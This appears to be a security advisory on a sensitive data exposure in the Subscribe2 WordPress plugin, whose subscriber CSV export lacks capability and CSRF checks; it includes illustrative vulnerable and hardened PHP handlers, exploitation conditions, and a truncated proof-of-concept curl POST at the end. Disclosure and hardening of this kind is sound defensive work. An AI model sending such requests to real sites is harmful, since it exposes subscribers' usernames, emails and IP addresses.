Subscribe2 [Sensitive Data Exposure]


The Subscribe2 plugin is vulnerable because it does not check user capabilities before exporting a CSV file of subscribed users. In addition, the export action has no CSRF protection, so a logged-in administrator can be made to trigger it from a page the attacker controls.
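The two missing controls, shown as an added illustration in the shape a WordPress handler would take. This is not Subscribe2's own code: the function names (s2_example_*), the nonce action name 's2_csv_export', the nonce field name 's2_csv_nonce' and the CSV column layout are assumptions; current_user_can, check_admin_referer, wp_nonce_field, wp_die and submit_button are real WordPress API functions.

```php
<?php
// Added example, not Subscribe2's code. Function names, the nonce action
// 's2_csv_export', the field 's2_csv_nonce' and the CSV columns are hypothetical.

// Vulnerable shape: anyone who can POST s2_admin=1&csv=1 gets the export.
function s2_example_export_csv_vulnerable( array $subscribers ) {
    if ( empty( $_POST['s2_admin'] ) || empty( $_POST['csv'] ) ) {
        return;
    }
    s2_example_send_csv( $subscribers );
}

// Hardened shape: require a capability AND a valid nonce before exporting.
function s2_example_export_csv( array $subscribers ) {
    if ( empty( $_POST['s2_admin'] ) || empty( $_POST['csv'] ) ) {
        return;
    }
    // Capability check: unauthenticated or low-privilege users are refused.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // CSRF check: the request must carry the nonce emitted with the admin form;
    // check_admin_referer() dies if the nonce is missing or invalid.
    check_admin_referer( 's2_csv_export', 's2_csv_nonce' );
    s2_example_send_csv( $subscribers );
}

// Streams the subscriber list as a CSV download (columns are assumed).
function s2_example_send_csv( array $subscribers ) {
    header( 'Content-Type: text/csv; charset=utf-8' );
    header( 'Content-Disposition: attachment; filename="subscribers.csv"' );
    $out = fopen( 'php://output', 'w' );
    fputcsv( $out, array( 'username', 'email', 'ip' ) );
    foreach ( $subscribers as $row ) {
        fputcsv( $out, array( $row['username'], $row['email'], $row['ip'] ) );
    }
    fclose( $out );
    exit;
}

// The admin form that triggers the export must emit the matching nonce,
// otherwise legitimate exports fail the check_admin_referer() test above.
function s2_example_export_form() {
    echo '<form method="post">';
    wp_nonce_field( 's2_csv_export', 's2_csv_nonce' );
    echo '<input type="hidden" name="s2_admin" value="1">';
    echo '<input type="hidden" name="csv" value="1">';
    submit_button( 'Export CSV' );
    echo '</form>';
}
```

With both checks in place, a direct POST from an unauthenticated client fails on the capability test, and a cross-site form submitted by an authenticated administrator fails on the nonce test, because the attacker cannot obtain a nonce tied to the victim's session.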

The caveat is that, to get any data back in the CSV file, an attacker must supply the email addresses of users who actually have an account on the affected site. The list must consist of valid email addresses separated by a comma followed by a Windows line separator (",\r\n").

The CSV file contains the username, IP address and other information related to the newsletter subscription.


curl -XPOST -d "s2_admin=1&csv=1&" \